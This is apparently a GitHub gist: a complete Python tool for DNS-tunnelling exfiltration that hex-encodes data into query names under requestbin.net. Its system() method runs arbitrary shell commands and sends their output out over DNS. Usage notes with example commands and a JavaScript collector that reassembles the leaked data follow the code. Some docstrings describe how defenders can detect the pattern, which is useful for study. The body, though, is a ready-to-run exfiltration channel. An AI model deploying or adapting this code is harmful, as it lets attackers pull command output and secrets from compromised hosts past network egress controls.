
@djosix
Created July 3, 2020 03:58
Leak data using DNSBin
#!/usr/bin/env python3
import socket, os
class DNSBinLeaker:
    """Exfiltrate data by encoding it into the labels of DNS query names.

    Each ``leak`` call hex-encodes the payload, cuts it into 32-character
    labels and resolves names of the form
    ``<label>.<label>...<index>.<leak_id>-<leak_count>.<dnsbin_id>.d.requestbin.net``.
    The lookup itself is the channel: the data travels outbound in the
    query name and the answer is discarded. On the wire this is the
    textbook DNS-tunnelling pattern -- bursts of long, unique, all-hex
    subdomains under one parent domain -- which is what resolver query
    logging and DNS egress monitoring should alert on.
    """

    def __init__(self, dnsbin_id, leak_id='leak'):
        """Store the DNSBin endpoint id and the tag used to label this run.

        Args:
            dnsbin_id: 20-character lowercase-hex DNSBin identifier; it
                becomes the label directly before ``d.requestbin.net``.
            leak_id: alphanumeric tag of 1-19 characters that prefixes the
                per-call sequence number in every query name.

        Raises:
            AssertionError: if either identifier fails the checks below.
                NOTE: ``assert`` is removed under ``python -O``, so these are
                not reliable input validation.
        """
        assert len(dnsbin_id) == 20
        assert all(c in '0123456789abcdef' for c in dnsbin_id)
        # Keep the tag usable as part of a DNS label: non-empty, short, alphanumeric.
        assert 0 < len(leak_id) < 20 and leak_id.isalnum()
        self.dnsbin_id = dnsbin_id
        self.leak_id = leak_id
        # Sequence number; bumped once per successful leak() and embedded in the name.
        self.leak_count = 0

    def leak(self, data):
        """Hex-encode ``data`` and emit it as one or more DNS lookups.

        Args:
            data: ``bytes``, or any object whose ``str()`` form should be
                sent (it is UTF-8 encoded first).

        Returns:
            The sequence number used for this call, i.e. ``leak_count``
            before it is incremented; it is the ``<leak_id>-<n>`` part of
            the query names and lets the collecting side regroup one payload.

        Raises:
            socket.gaierror: propagated from ``gethostbyname`` when a lookup
                fails; in that case ``leak_count`` is not incremented, so the
                next call reuses the same sequence number.
        """
        if not isinstance(data, bytes):
            # ensure bytes: non-bytes input is stringified and UTF-8 encoded
            data = str(data).encode()
        # hex encode: two lowercase hex chars per byte, all valid DNS label characters
        data = ''.join(f'{b:02x}' for b in data)
        leak_count = self.leak_count
        # Fixed tail of every name for this call: <leak_id>-<seq>.<dnsbin_id>.d.requestbin.net
        suffix = '{}-{}.{}.d.requestbin.net'.format(
            self.leak_id, leak_count, self.dnsbin_id)
        # Group the hex string into labels of 32 chars (16 bytes) and at most
        # 6 labels per name, i.e. up to 96 payload bytes per lookup --
        # presumably sized to stay under DNS name-length limits (not checked here).
        chunks_list = [[]]
        for i in range(0, len(data), 32):
            chunk = data[i:i+32]
            if len(chunks_list[-1]) < 6:
                chunks_list[-1].append(chunk)
            else:
                chunks_list.append([chunk])
        for index, chunks in enumerate(chunks_list):
            # filter(bool, ...) drops empty labels (only the initial empty group when data is empty).
            prefix = '.'.join(filter(bool, chunks))
            # <labels>.<group index>.<suffix>; the index lets the receiver reorder groups.
            hostname = '{}.{}.{}'.format(prefix, index, suffix)
            # The query is the transmission; the resolved address is never used.
            socket.gethostbyname(hostname)
        self.leak_count += 1
        return leak_count

    def system(self, cmd):
        """Run ``cmd`` via the shell and leak its captured standard output.

        ``os.popen`` passes the string to the shell, so ``cmd`` is executed
        with the current process's privileges; only stdout is captured and
        handed to ``leak``. Returns whatever ``leak`` returns.
        """
        return self.leak(os.popen(cmd).read())
if __name__ == '__main__':
    import argparse
    # CLI: --dnsbin/-d is the 20-char DNSBin id, --name/-n the run tag
    # (default 'test'), and each positional argument is a shell command
    # whose stdout is leaked in turn. --dnsbin has no default, so omitting it
    # passes None to the constructor, where len(None) raises TypeError.
    parser = argparse.ArgumentParser()
    parser.add_argument('--dnsbin', '-d', type=str)
    parser.add_argument('--name', '-n', type=str, default='test')
    parser.add_argument('cmds', nargs='+', type=str)
    args = parser.parse_args()
    leaker = DNSBinLeaker(args.dnsbin, args.name)
    for cmd in args.cmds:
        # Return value (the sequence number) is discarded here.
        leaker.system(cmd)

# Usage notes and the browser-side collector, kept as a bare module-level
# string; it is never executed by this script.
'''
1. Create a DNSBin here and get your DNSBIN_ID:
http://requestbin.net/dns
2. Run this:
python3 dnsbin_leaker.py --dnsbin=DNSBIN_ID --name=test1 id ls groups 'ls / | wc -l'
3. Run this on the webpage: `collect`
function collect(id, n) {
$('.message-detail > h5').remove();
let getIndex = (a => Number(a[a.length - 2]));
let getData =
a => a.slice(0, a.length - 2)
.join('').match(/.{2}/g)
.map(c => String.fromCharCode(parseInt(c, 16)))
.join('');
return $('.message-detail').get()
.map(el => el.textContent)
.filter(c => c.endsWith(`.${id}-${n}`))
.map(x => x.split('.'))
.map(a => ({index: getIndex(a), data: getData(a)}))
.sort((a, b) => (a.index > b.index))
.map(x => x.data).join('');
};
console.log(collect('test1', 0));
console.log(collect('test1', 1));
'''